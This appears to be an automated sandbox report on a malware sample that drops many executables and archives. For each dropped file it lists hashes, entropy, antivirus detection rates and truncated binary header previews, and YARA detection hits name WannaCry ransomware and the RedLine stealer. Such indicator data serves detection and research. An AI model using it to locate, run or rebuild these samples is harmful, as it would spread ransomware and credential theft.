                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........\..}\..}\..}Q..}...}Q.!}B..}Q..}...}...}^..}..0}X..}..5}}..}\..}...}y..}9..}Q.%}]..}y. }]..}Rich\..}................PE..L......V.................p...B......oq............@.................................E\.......................................*...................................#......8...............................@............................................text...5o.......p.................. ..`.rdata...............t..............@..@.data...@I...P.......6..............@....rsrc................P..............@..@.reloc...#.......$...b..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):225280
                                                                                                                                                    Entropy (8bit):7.663735783294972
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:EJv/3Ppzq+M4Lh5VWK5qlYRV+hvuFiweXXbGgL90v5mq33Z3:8hzEA5GlYMWFBeXvx0c+3
                                                                                                                                                    MD5:3ED3FB296A477156BC51ABA43D825FC0
                                                                                                                                                    SHA1:9CAA5C658B1A88FEE149893D3A00B34A8BB8A1A6
                                                                                                                                                    SHA-256:1898F2CAE1E3824CB0F7FD5368171A33ABA179E63501E480B4DA9EA05EBF0423
                                                                                                                                                    SHA-512:DC3D6E409CEE4D54F48D1A25912243D07E2F800578C8E0E348CE515A047ECF5FA3089B46284E0956BBCED345957A000EECDC082E6F3060971759D70A14C1C97E
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 82%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......eU!.!4O.!4O.!4O.!4O. 4O.Rich!4O.................PE..L...{....................\...........(.......p....@..................................................................................p..\............................................................................................................text...I[.......\.................. ....rsrc...\....p.......^.............. .............4)...t....I.....px.:.0.57. Jr~L..3.;..FkJ......F.W.`.;..$g..... u.l......7...)..SO.=...*.).!vZmX4....Er...H0....*..........,./$.....@..}D........b.q...k.w...h.P..E..(R.....m..2)+b.......{.\.0......}".?.....6.HJK}..s..K.=L...I.C....#.W....aY...o......bvr.myH%.5.@.{..>...&.h6.#=.[.......N....kD..(....?.t.'z..s..*.p...._YA...T...dI..Ry....H=?..Y.=..+........[.d$..C?eE.....N.(.'.V(....l....9IJ....5.$B..].O.3..AJ.B.5...{]...` T. >......3.L.\...5s.......
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1096816
                                                                                                                                                    Entropy (8bit):7.983532463541044
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:32eLSKYFDvuca/8b/gvKyLNWg8daBqqxAWvEZon2USxZr:32yQF7uz/IyL8gJqKvUc2UM9
                                                                                                                                                    MD5:0002DDDBA512E20C3F82AAAB8BAD8B4D
                                                                                                                                                    SHA1:493286B108822BA636CC0E53B8259E4F06ECF900
                                                                                                                                                    SHA-256:2D68FE191BA9E97F57F07F7BD116E53800B983D267DA99BF0A6E6624DD7E5CF7
                                                                                                                                                    SHA-512:497954400AB463EB254ABE895648C208A1CC951ECB231202362DADBE3FFB49D8D853B487589CE935C1DC8171F56D0DF95093FFC655C684FAA944C13BCFD87B8B
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 35%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 20%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................D....................@..........................P...................@..............................P.......$2..........................................................................................................CODE....@........................... ..`DATA....H...........................@...BSS.....4................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...$2.......4..................@..P.............@......................@..P........................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2520576
                                                                                                                                                    Entropy (8bit):7.746940560683332
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:CEwbO4PqokXfEP5lJSHlxfGe9pkDda1ei/o+HapablRA9h9nNf3cfxRt5Q469DTd:amokPClGZ9MWwL73KzTaTn6nX2gEeFvE
                                                                                                                                                    MD5:02F471D1FEFBDC07AF5555DBFD6EA918
                                                                                                                                                    SHA1:2A8F93DD21628933DE8BEA4A9ABC00DBB215DF0B
                                                                                                                                                    SHA-256:36619636D511FD4B77D3C1052067F5F2A514F7F31DFAA6B2E5677FBB61FD8CBA
                                                                                                                                                    SHA-512:287B57B5D318764B2E92EC387099E7E313BA404B73DB64D21102BA8656636ABBF52BB345328FE58084DC70414C9E2D8CD46ABD5A463C6D771D9C3BA68759A559
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 93%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 64%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q...5..Q5..Q5..Q<.-Q4..Q<.;Q4..Q5..Q}..Q...Q<..Q<.2Q1..Q<.*Q4..Q+.,Q4..Q<.)Q4..QRich5..Q........PE..L....#,G.................$...r&...h...i...i..0i...@...................................'..........@...................;i......1i......pi.T&&...i. ...........................................P@i......................0i..............................code.....h..............................text....*....i..,..................@....rdata.......0i......0..............@....tls.........Pi......H..............@....CRT.........`i......J..............@..@.rsrc...T&&..pi..(&..L..............@..@.reloc...............t&.............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):926208
                                                                                                                                                    Entropy (8bit):7.962685597000549
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:bnQv6Dyxn2Qx0KHizHWKxHuyCcZFyXR1tG:2OE2QtCzhh/7R
                                                                                                                                                    MD5:0315C3149C7DC1D865DC5A89043D870D
                                                                                                                                                    SHA1:F74546DDA99891CA688416B1A61C9637B3794108
                                                                                                                                                    SHA-256:90C2C3944FA8933EEFC699CF590ED836086DEB31EE56EC71B5651FD978A352C9
                                                                                                                                                    SHA-512:7168DC244F0E400FA302801078E3FAEC8CDD2D3CB3B8BAAAB0A1B3C0929D7CF41E54BFBE530AD5CE96A6B63761F7866D26AAAE788C3138C34294174091478112
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 80%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=.s.y...y...y.......x.....G.x...Richy...........................PE..L...A..K.................L...................`....@.............M.-..........P...............................................X..P....p..0...................................................................0...X.......p............................text...$J.......L.................. ..`.data...@....`......................@....rsrc........p.......P..............@..@..H(...Y..H3......I@......IM...........user32.dll.MSVBVM60.DLL.kernel32.dll.NTDLL.DLL..................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1505280
                                                                                                                                                    Entropy (8bit):7.951929263490591
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:yYzpj9/AteBV+n/yETaXh8Nv9Xx5/ttAoRfwAy+/CxCWfxBcMkC9e327kY:djRAK+6Fh8zPvrRISCxt5q3SA
                                                                                                                                                    MD5:E1B69C058131E1593ECCD4FBCDBB72B2
                                                                                                                                                    SHA1:6D319439CAC072547EDD7CF2019855FA25092006
                                                                                                                                                    SHA-256:B61C53F4137C41AA0A5538FC9A746034B3A903CC4B1B3C8B5F3D3118E1E2BD8F
                                                                                                                                                    SHA-512:161A5923DC3A6507CBEE3B547EDCEF4FBFE1DC6A04832C2472B1E635D758D1503A61361C2A83A13A0D8E4607516FDA4AE6462A74DF66B20A7C93174BBCC7129C
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 81%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 56%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T..5b..5b..5b......5b..5c..5b..M.5b..M.5b.Rich.5b.................PE..L...P.IM.....................................0....@..........................@............@..................................0..(................................5...................................................0...............................text............................... ..`.rdata..p....0....... ..............@..@.data........@......."..............@....rsrc...............................@..@.reloc...F.......H..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1257984
                                                                                                                                                    Entropy (8bit):6.67278609716153
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:QH1eYXlVeneL/AuCeGhqzjheKTnHdQSR9wlPlVlbzl+lwlElPS3PomNX:QVZVeneLYcmiN7Q6Md3dMyuI
                                                                                                                                                    MD5:D5E5853F5A2A5A7413F26C625C0E240B
                                                                                                                                                    SHA1:0CED68483E7F3742A963F2507937BB7089DE3FFE
                                                                                                                                                    SHA-256:415DD13C421A27ED96BF81579B112FBAC05862405E9964E24EC8E9D4611D25F3
                                                                                                                                                    SHA-512:49EA9AB92CE5832E702FAC6F56A7F7168F60D8271419460ED27970C4A0400E996C2EA097636FC145E355C4DF5CFBF200B7BF3C691133F72E4CAD228F570B91E4
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 64%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 56%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0O{>t..mt..mt..my|.mU..m2..ms..my|.m...my|.m...m}V.m}..m}V.ma..mt..m...m.W.mi..my|.mu..mt..mu..m.W.mu..mRicht..m................PE..L...$_.U.................~..........ju............@.......................................@.............................................X...........................................................Pd..@............................................text....}.......~.................. ..`.rdata...d.......f..................@..@.data...l........L..................@....rsrc...X............4..............@..@.reloc...K...`...L..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2330112
                                                                                                                                                    Entropy (8bit):7.9751665313341285
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:49152:agXTaxuzs1L1ivBzV+3ZYqjuPOBW0wtuVXgPcOU7m6X+d:aeTaxuo1LYvT+3SiiO8LcZOU7XU
                                                                                                                                                    MD5:7DDE6427DCF06D0C861693B96AD053A0
                                                                                                                                                    SHA1:086008ECFE06AD06F4C0EEE2B13530897146AE01
                                                                                                                                                    SHA-256:077C04EE44667C5E1024652A7BBE7FFF81360EF128245FFD4CD843B7A56227CF
                                                                                                                                                    SHA-512:8CF162F83EBFA2F3DB54B10D5B0E6AF590E97596AC2D469058A98340BF27DE2866E679C777AA46DD530DB44C27503D4CEA8C34D96CB83B71477A806B5AB7C1B9
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 81%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 72%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L.....7M.................`!..................p!...@..........................0D.................. ..........................L.>.......$.......................................................>..............................................................`!......|..................@................p!.....................@................@$......"..............@................P$......$..............@................`$..v...&..............@.................$.....................@...
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):448512
                                                                                                                                                    Entropy (8bit):7.686352303150041
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:hBGrTx2fgEViq+JoQ9tpecSXFADhKXPEKJRlETLV+PwoVUqwhlKq6yem8lhg:6rLEyptwnX+gXrRlESwKKhlP6yxGh
                                                                                                                                                    MD5:03BAEBA6B4224371CCA7FA6F95AE61C0
                                                                                                                                                    SHA1:8731202D2F954421A37B5C9E01D971131BD515F1
                                                                                                                                                    SHA-256:61A9E3278B6BCC29A2A0405B06FB2A3BBCB1751C3DD564A8F94CC89EA957EC35
                                                                                                                                                    SHA-512:386643B0A52B6B1A53E81A8500D040B6415E532EBAFFD1BE8D1AFD4CCB10F6C0342CF734B688EC803B960339284C8D9669E638B1648D9CC734CF7367659C7FD0
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 86%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 72%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>.5G..........................................@.........................................................................a.......Y ...e..............................................................................D............................rsrc...ru.......v..................@..@.data................z...................text...Y........................... ..`.rdata..*2.......4..................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed, RAR self-extracting archive
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):789363
                                                                                                                                                    Entropy (8bit):7.995564811336945
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:24576:ePPNsFNARXFh0Gy9Gtgt09HlncQXZlFeI5D7Cj+o:RNkltHXXZlFeiHab
                                                                                                                                                    MD5:8CD7C19B6DC76C116CDB84E369FD5D9A
                                                                                                                                                    SHA1:5E3ECD3E4EF8ADC294DB1E3525CDBDE46B2B7DDC
                                                                                                                                                    SHA-256:47769A82AC9994BF50FDB7FF521D2364775AFEA3DA02D55450448A25E6F94645
                                                                                                                                                    SHA-512:909D0A2EC4AF33C374D7453926E5999BADD2F9FA79D0648A7308F63911F673AE34EC275917999199E9FB3A669AF5C4AA460E7639C5E346F261DECD28B520039A
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 20%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L......@..................... ...P..p....`........@..........................0................... ..........................<)..........<...........................................................................................................UPX0.....P..............................UPX1.........`......................@....rsrc.... ..........................@..............................................................................................................1.20.UPX!....
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):199168
                                                                                                                                                    Entropy (8bit):7.816608369359199
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:slkfrcHVaq65Oe/ALwm19MYDzMLGquSOt+nSmgevSvoWAnvN0bfINcfln8rvK:Wkfrc0q47/UwQFSFnH9SArvakSflnCS
                                                                                                                                                    MD5:8803D517AC24B157431D8A462302B400
                                                                                                                                                    SHA1:B56AFCAD22E8CDA4D0E2A98808B8E8C5A1059D4E
                                                                                                                                                    SHA-256:418395EFD269BC6534E02C92CB2C568631ADA6E54BC55ADE4E4A5986605FF786
                                                                                                                                                    SHA-512:38FDFE0BC873E546B05A8680335526EEC61CCC8CF3F37C60EEE0BC83EC54570077F1DC1DA26142488930EABCC21CB7A33C1B545A194CBFB4C87E430C4B2BFB50
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 83%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......eU!.!4O.!4O.!4O.!4O. 4O.Rich!4O.................PE..L...{.............................................@.......................... ..........................................................\............................................................................................................text............................... ....rsrc...\........................... ...........IS&.u..n.y...P0..c{. ..J..b.>..o.i...R...3.Ap..3...~.EW_.Y.}+..A.2.h.(N^.....B....e....l.h.}.R....?.....y..(.3....Gp.u..n.....P.j...2.R2.(.7.....5...m).&.G..RvZS....?$. t.z...e|3.-..........pRj...c.....]b.7T*..D..R.s...lS.\.i..0..yL?.....E{......ex..+.\.l..........AS..`_I8.....A..]c.r...h....Z......Z[../.f.}.p...[.6.t...IAx`....K.K@v}.#.x.../R.......@!:A.;E39.J......'1....3.)BE..........TER*b....O........U.rS_<..........E.....@....0v.....|.we.....@].
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3514368
                                                                                                                                                    Entropy (8bit):7.995470941164686
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3x:QqPe1Cxcxk3ZAEUadzR8yc4gB
                                                                                                                                                    MD5:84C82835A5D21BBCF75A61706D8AB549
                                                                                                                                                    SHA1:5FF465AFAABCBF0150D1A3AB2C2E74F3A4426467
                                                                                                                                                    SHA-256:ED01EBFBC9EB5BBEA545AF4D01BF5F1071661840480439C6E5BABE8E080E41AA
                                                                                                                                                    SHA-512:90723A50C20BA3643D625595FD6BE8DCF88D70FF7F4B4719A88F055D5B3149A4231018EA30D375171507A147E59F73478C0C27948590794554D031E7D54B7244
                                                                                                                                                    Malicious:true
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, Author: Florian Roth (with the help of binar.ly)
                                                                                                                                                    • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, Author: us-cert code analysis team
                                                                                                                                                    • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, Author: ReversingLabs
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 88%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T...T...T..X...T.._...T.'.Z...T..^...T..P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L...A..L.................p... 5......w............@...........................5.................................................d.........4..........................................................................................................text....i.......p.................. ..`.rdata..p_.......`..................@..@.data...X........ ..................@....rsrc.....4.......4.................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2511528
                                                                                                                                                    Entropy (8bit):7.210453995706242
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:49152:6kAG2QGTC5xvMdgpdb1KRHGepUu2cGbqPs9+q2HRPTnFVSLE:6kAjQGTCnvMmpYQqPNRPTnF4Y
                                                                                                                                                    MD5:DBFBF254CFB84D991AC3860105D66FC6
                                                                                                                                                    SHA1:893110D8C8451565CAA591DDFCCF92869F96C242
                                                                                                                                                    SHA-256:68B0E1932F3B4439865BE848C2D592D5174DBDBAAB8F66104A0E5B28C928EE0C
                                                                                                                                                    SHA-512:5E9CCDF52EBDB548C3FA22F22DD584E9A603CA1163A622DB5707DBCC5D01E4835879DCFD28CB1589CBB25AED00F352F7A0A0962B1F38B68FC7D6693375E7666D
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 31%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y..v*..v*..v*...*..v*...*..v*...*I.v*...*.v*...*..v*..w*/.v*...*..v*...*..v*...*..v*Rich..v*........PE..L.....V............................Lh............@..................................v....@..................................s..,....@.......................`......@...............................Xm..@...............@....e.......................text............................... ..`.rdata..z...........................@..@.data............0..................@....rsrc........@......................@..@.reloc..2....`......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):86016
                                                                                                                                                    Entropy (8bit):7.7036277170460306
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:vpeW2JCTz5eDMn1Wi8N36flDRdHOjN0O02SHU00wCpEbE1PDai41lkgD:xH2JCTz5mmYoDRdHOB0O3d00wiEY134D
                                                                                                                                                    MD5:9D15A3B314600B4C08682B0202700EE7
                                                                                                                                                    SHA1:208E79CDB96328D5929248BB8A4DD622CF0684D1
                                                                                                                                                    SHA-256:3AB3833E31E4083026421C641304369ACFD31B957B78AF81F3C6EF4968EF0E15
                                                                                                                                                    SHA-512:9916397B782AAAFA68EB6A781EA9A0DB27F914035DD586142C818CCBD7E69036896767BEDBA97489D5100DE262A554CF14BCDF4A24EDDA2C5D37217B265398D3
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@..........................................$..{(.k..Q...M.D......S5I......3..:........I-..Ea.........:..l~.?~.?~.?.U.?Y.?...?..?p..?..?#..?..?...?e.?.g.?..?Rich~.?........PE..L..._l.H.....................@......0.............@.............................................................................T........=..........................................................................................................UPX0....................................UPX1................................@....rsrc....@.......@..................@..............................................................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):179477
                                                                                                                                                    Entropy (8bit):7.998951302367822
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:3072:5oVnkybquxcF6U/aVHOBuv7j4/rIUUT4iI5mflT9xuUqywFdiZS3e:5oV5bZxIsV4l/kz4iFh98UqywKw3e
                                                                                                                                                    MD5:6D8C9D01BA5C32AEDC734087CC3D0B1B
                                                                                                                                                    SHA1:F7E58E5EDD203ABC2364922B11B6641D3EE9ADD5
                                                                                                                                                    SHA-256:92E885D1763E4BA1ABC92BEE9B08CA7A2AE358BDA5FE98B31A8E217327982BF7
                                                                                                                                                    SHA-512:090B972E7D854DEE8C1DC45EE3035247EB8AB641C337FF8DA6DC3DBB84FA447DEEE688F760D36FDFB93CCA50D4AB27B5AB3347F75C5E4207A06E0ADA0607E3F7
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK..........MF..D.U...H.......Endermanch@FakeAdwCleaner.exe.cM2.N....,[Uo.a...#.M.]9(..xG.+...;.0.oT....L....8,..#..SK...n."g.N..[....[........l...F..f RI.Y.;.....L>..ob......k=...Ps.m.`$.....]5Z.F.S......\.fC.k...cp..{.`...u....:.#j.!.d.m.FV.....@X....Q.^....s7..Ml..d~9.y..A...U..J.).I..t.m.M.kg.E)....Me..`..<D=.1P."= ..2q.X...{.........)pcx.$..ZU.....$..|......k.st.E.v..r..{8.d.%..V.!.n....<B.9......?n#Z.U.........Fs..O.^ {.G.R#.]..5..Z....H@64............:+9#5P..J9......D.N.F...j..J...M.bJ$...B.B..(.&7...E....g]sC.L{].-...Th+..f..7.zI....h..k...:?B.!........C.....{....?...35v..........8..f).apaP.....*:....'.....Y.6u.>.?...6........G.s.<....j......-..tv.....H1i.Z....`....`.N .f.c0.uc.../..M ._T..I..Q..6....X..'`3..N..EdU..^....|....EM5.q...Do.....~9.toC......".ZW-...?..&P.....0....f.n.L.ti.Y.....QB....[/..-.M.7......P.....Q.)..!..A...../..OS9.gp....-.:s.$.&sv-\....S....W/~...Y@q..ada.* k6...d*...x`e...\.q.&}./,....i.9.;.,.3...1..}.Url........M"
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):267776
                                                                                                                                                    Entropy (8bit):7.535290233283343
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:vDKW1LgppLRHMY0TBfJvjcTp5XxG8pt+oSOpE22obq+NYgvPuCEbMBWJxLRiUgV:vDKW1Lgbdl0TBBvjc/M8n35nYgvKjdzi
                                                                                                                                                    MD5:7D80230DF68CCBA871815D68F016C282
                                                                                                                                                    SHA1:E10874C6108A26CEEDFC84F50881824462B5B6B6
                                                                                                                                                    SHA-256:F4234A501EDCD30D3BC15C983692C9450383B73BDD310059405C5E3A43CC730B
                                                                                                                                                    SHA-512:64D02B3E7ED82A64AAAC1F74C34D6B6E6FEAAC665CA9C08911B93EDDCEC66595687024EC576E74EA09A1193ACE3923969C75DE8733859835FEF45335CF265540
                                                                                                                                                    Malicious:true
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\Desktop\Fantom.exe, Author: Joe Security
                                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\Desktop\Fantom.exe, Author: ditekSHen
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~.................W....PE..L...t..P..........#..........z....../.............@..........................`.......;..........................................P....`..................................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc........`....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):203087
                                                                                                                                                    Entropy (8bit):7.998965133479219
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:6144:gEXMZKhTuDA9rBNxIzdZgNbSEehM1Kq+i:gVKNuKdIzcNbxD1f+i
                                                                                                                                                    MD5:3500896B86E96031CF27527CB2BBCE40
                                                                                                                                                    SHA1:77AD023A9EA211FA01413ECD3033773698168A9C
                                                                                                                                                    SHA-256:7B8E6AC4D63A4D8515200807FBD3A2BD46AC77DF64300E5F19508AF0D54D2BE6
                                                                                                                                                    SHA-512:3AAEEB40471A639619A6022D8CFC308EE5898E7CE0646B36DD21C3946FEB3476B51ED8DFDF92E836D77C8E8F7214129C3283AD05C3D868E1027CB8CE8AA01884
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK........d..LZt.7............Fantom.exe"..[.m1...}.U.3.*..:\..]7..n[.=Z..m.E.......h$.\@.M....~...+..._@&=ds..z..tbV.k..f...!5E\..._a...A...r...r6I..v.-S.....I...._..?....b.Bg.....~..PK.z,.D..B...B..<.'.|....z.....J.`@.a..../^0h.9.s.41di.b...=..,....d.HplX.=.%.a.Y.J.nrS...Vk.;K.7_.lvCx1....I..."....k.....me......pT....P.f7....~...{v.u.4....3F....4.].$....2.4a..-`......&....$......;3. ..6......d.....lg.P.o..^.1.R7y%O.....x......:...T.(L...2.....}...E..#.. .0.G.Z.^.p..vN.m{.........P..!...a..u...8..:.....>.0.~...f..dz1L.0..Bu<.h..v...BQ{...W. .`....I.Y...s<s..X..3.N.8........^..q/}.+.\i.Y.....l".k..e....AS45k...Y.o...[.~......#..G.b..f.c..|.cKe"b#..;..O.#].H..H......~...Rc...j.....8..1k..u.)hB.*..S:...C.;.e.H......|.O...:..v+...B.W[....<^..1....l..8....n(.....R44.&v..0v_az.s$...%...`Fp...0^..5...xg...eSO.FJ..,..-.........7T).J...LV.xe.#.P..8%..P.8..2.......+8D.j.xMY\x>..Erc.ymj^c*...^.h....E.A..;.`....'.i..R.. .W5m..!...&4.K...O1.?.8
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
